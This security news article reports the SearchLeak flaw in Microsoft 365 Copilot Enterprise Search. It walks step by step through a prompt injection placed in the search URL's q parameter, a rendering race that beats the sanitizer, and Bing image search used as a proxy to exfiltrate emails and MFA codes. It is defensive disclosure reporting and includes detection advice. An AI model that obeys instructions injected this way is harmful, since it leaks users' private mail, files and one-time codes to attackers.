One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes

Summary

Researchers discovered a critical vulnerability in Microsoft 365 Copilot Enterprise Search, dubbed SearchLeak, which allowed attackers to steal emails, files, and MFA codes with a single click. The flaw chained three bugs, exploiting a parameter-to-prompt injection and leveraging Bing's image search as an exfiltration proxy, bypassing traditional security measures. Microsoft has mitigated the issue on its backend.

Full text

One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes Swati KhandelwalJun 15, 2026Vulnerability / Enterprise Security A single click on a trusted Microsoft link could have let an attacker pull emails, calendar details, and indexed files out of Microsoft 365 Copilot Enterprise Search. Researchers at Varonis Threat Labs chained three bugs into a one-click exfiltration path they call SearchLeak. Because the link pointed to a real microsoft.com domain, traditional anti-phishing and URL filtering tools were unlikely to flag it. No prompt, no password, no second click. Microsoft assigned CVE-2026-42824 and marked it critical; the CVSS scores ran lower and disagreed, 6.5 from Microsoft and 7.5 from the National Vulnerability Database. The company mitigated the flaw on its backend, so customers have nothing to worry about, and Varonis presented a proof-of-concept, not observed exploitation. Three bugs, one click Microsoft's advisory describes the flaw as a command injection that can expose information over a network. In practice, SearchLeak stacks one AI-specific weakness on two old web bugs, and each link is needed for the next. The entry point is the q parameter in the Copilot Enterprise Search URL. It is meant for a natural-language query, but Copilot reads whatever sits there as instructions, not just a search string. Varonis calls this Parameter-to-Prompt injection. An attacker writes a URL that tells Copilot to search the mailbox, take an email title, and place it inside an image URL. The victim types nothing. They click, and Copilot does the work. Next is a race condition in how the response renders. Microsoft's guardrail wraps Copilot output in <code> blocks so the browser treats markup as text. The catch is timing: the wrapping happens after Copilot finishes generating, but the browser renders the stream as it arrives. The injected <img> tag is drawn and fires its request before the sanitizer runs. By the time the output is neutralized, the request has already left. The last link gets the data past the page's Content Security Policy. The CSP on m365.cloud.microsoft blocks images from arbitrary domains, but it allowlists *.bing.com. Bing's "Search by Image" endpoint accepts an image URL and fetches it server-side to analyze it. Point that fetch at an attacker's server with the stolen text encoded in the path, and Bing retrieves it. The browser's CSP never applies, because the request comes from Bing's infrastructure. Bing becomes the exfiltration proxy. The CSP allowlist does the hiding. Put together: the victim clicks, Copilot searches their data, the response embeds a value like an email subject in a Bing image URL, the browser calls Bing during streaming, and Bing pulls the attacker's URL. The attacker reads it off their own logs, for example, a request for /Your_Security_Code_847291/img.png. What an attacker gets Copilot Enterprise can reach whatever the signed-in user can, through their Microsoft Graph access, and the attacker inherits that reach without ever logging in. The most time-sensitive prize sits in the inbox: one-time codes, MFA codes, and password-reset links, often still valid for a few minutes. A script that lifts those off a log while the window is open can take over an account before anyone notices. The same access also reaches calendar invites, meeting notes, and any SharePoint or OneDrive file Copilot has indexed, where the salary data, earnings figures, and acquisition plans live. SearchLeak is the second time Varonis has shown this pattern. Varonis researcher Dolev Taler demonstrated the same one-click technique in an earlier Reprompt attack against Copilot Personal, and it held up against Enterprise Search despite the extra guardrails that tier is supposed to enforce. The same pattern showed up in EchoLeak (CVE-2025-32711), the zero-click Copilot data-leak bug Aim Security disclosed in 2025. SSRF and sanitizer races are old bug classes; the prompt injection is the new part, and it makes them reachable again. Microsoft mitigated the flaw on its backend, and because Copilot Enterprise is a managed service, tenant admins cannot patch or reconfigure the parts that failed. What they can do is watch and contain. Look for Copilot Search URLs carrying encoded payloads or HTML in the q parameter, and for unusual outbound requests to Bing's image endpoints. Tighten data-access governance so Copilot indexes less, which shrinks what any future leak can reach. Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share Share SHARE  Bing, Copilot, CSP, data exfiltration, enterprise security, Microsoft, Microsoft 365, Prompt Injection, Varonis, Vulnerability ⚡ Top Stories This Week Chrome V8 Zero-Day CVE-2026-11645 Exploited in the Wild - Patch Now Researchers Build Self-Replicating AI Worm That Operates Entirely on Local, Open-Weight Models Microsoft Defender RoguePlanet Zero-Day Grants SYSTEM Access on Updated Windows Anthropic Releases Claude Fable 5, Its Most Powerful AI Yet, With Cyber Safeguards Microsoft Patches Record 206 Flaws, Including Three Zero-Days and Critical RCE Bugs Ivanti, Fortinet, and SAP Release Patches for Multiple Critical Vulnerabilities Cybersecurity Stars Awards 2026: Winners Announced Across 95 Categories ThreatsDay Bulletin: Worm Code Leaked, AI Agent Phished, Claude Code Patch + 28 New Stories New GreatXML Exploit Bypasses Windows BitLocker via Recovery Partition XML Files Agentjacking Attack Tricks AI Coding Agents Into Running Malicious Code China-Linked Hackers Backdoored Linux Login Software to Hide for Nearly a Decade Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication U.S. Orders Anthropic to Suspend Fable 5 and Mythos 5 Access for Foreign Nationals Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit ⭐ Featured Resources Get the 2026 Guide to Govern and Secure Enterprise AI Agents at Scale [Watch Demo] See Which Security Gaps Attackers Could Exploit First AI Can’t Stop Every Attack. Learn How Zero Trust Can Block What’s Unknown Have You Outgrown Your MDR? 7 Warning Signs Every CISO Should Check

Indicators of Compromise

• cve — CVE-2026-42824

Entities